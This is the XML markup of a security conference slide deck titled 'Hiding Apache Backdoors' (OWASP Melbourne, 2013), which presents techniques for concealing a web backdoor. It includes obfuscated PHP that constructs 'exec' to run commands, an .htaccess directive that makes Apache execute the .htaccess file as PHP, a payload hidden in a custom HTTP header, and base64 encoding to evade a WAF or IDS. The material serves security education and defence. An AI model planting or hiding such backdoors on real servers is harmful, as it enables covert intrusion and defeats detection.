      <a:lvl4pPr marL="538163" indent="-179388"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717550" indent="-179388"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hyperlink" Target="http://github.com/wireghoul/htshells"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baesystemsdetica.com.au/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:australia@baesystemsdet.com" TargetMode="Externa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9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236538" y="1600200"/>
            <a:ext cx="8574087" cy="460375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hiding Apache Backdoors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060575"/>
            <a:ext cx="8572500" cy="460375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236538" y="2724150"/>
            <a:ext cx="8572500" cy="1281113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>OWASP Melbourne – 03 May 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Eldar Marcussen</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31748" name="Picture Placeholder 1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840" t="21779" r="1547" b="60500"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5295900"/>
            <a:ext cx="2987675" cy="831850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31749"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776" t="36140" r="3346" b="24811"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149975" y="5295900"/>
            <a:ext cx="3001963" cy="831850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31750" name="Picture Placeholder 8"/>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6042" t="22766" r="2211" b="60132"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074988" y="5295900"/>
            <a:ext cx="2987675" cy="831850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31751" name="Picture Placeholder 2"/>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2899" t="11282" r="812" b="48601"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4381500"/>
            <a:ext cx="2989263" cy="831850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31752" name="Picture Placeholder 4"/>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421" t="16103" r="2570" b="44044"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149975" y="4381500"/>
            <a:ext cx="3001963" cy="831850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31753" name="Picture Placeholder 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3943" t="14240" r="4156" b="47380"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3074988" y="4381500"/>
            <a:ext cx="2987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Objective: Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>url</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Keep the location of the backdoor hidden</a:t>
            </a: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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial"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66938"/>
            <a:ext cx="8786152" cy="3926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763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Objective: Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>forensic evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Hide the backdoor access from the web server logs</a:t>
            </a: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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs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66938"/>
            <a:ext cx="8786152" cy="3926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763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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Writing the backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2505336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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stealth implementation</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AU" dirty="0" smtClean="0"/>
              <a:t>No bad function calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Avoid WAF/IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>forensic evidence</a:t>
            </a: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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366636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No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>bad function calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>$e = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>('y','e','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>yxyc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>'); </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>e($cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>exec on $cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other tricks work too: $e = “ex” . “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" dirty="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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533844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Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>file</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Use the operating system features to hide file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dotFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> (*nix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> (win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.Treat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> file as php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>&lt;Files ~ "^\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>    Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>allow,deny</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>    Allow from all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>&lt;/Files&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>AddType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-php .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312596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Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>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Hide the payload in unusual header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>GET /favicon.ico HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>deflate,gzip;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Connection: TE, close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>lwp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-request/5.834 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>libwww-perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/5.834</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ETag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: secret data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1757869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Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>WAF/IDS</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Use base64?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:~# echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> –a’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>| base64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dW5hbWUgLWEK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:~# echo dW5hbWUgLWEK | base64 -d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
